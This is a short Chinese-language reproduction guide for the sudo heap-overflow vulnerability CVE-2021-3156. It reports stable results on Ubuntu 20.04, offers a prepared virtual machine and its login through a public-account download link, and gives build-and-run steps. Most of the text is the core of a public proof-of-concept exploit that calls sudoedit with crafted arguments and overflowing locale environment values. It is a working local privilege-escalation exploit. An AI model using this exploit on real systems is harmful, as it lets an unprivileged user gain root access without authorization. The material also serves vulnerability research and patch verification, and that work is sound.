目前exp在ubuntu 20.04環境下穩定運行,其他linux發行版未測試
環境已經上傳至百度雲盤中,請關注公眾號並后台回復sudo獲取下載鏈接。
虛擬機的用戶名密碼為 vagrant/unicodesec
復現過程
根目錄中進入CVE-2021-3156文件夾中,執行make編譯項目,隨后執行sudo-hax-me-a-sandwich
過程如下圖所示
exp代碼如下
int main(int argc, char *argv[]) {
// CTF quality exploit below.
char *s_argv[]={
"sudoedit",
"-u", "root", "-s",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
"\\",
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
NULL
};
char *s_envp[]={
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
"\\", "\\", "\\", "\\", "\\", "\\", "\\",
"X/P0P_SH3LLZ_", "\\",
"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
NULL
};
printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");
execve(SUDOEDIT_PATH, s_argv, s_envp);
return 0;
}
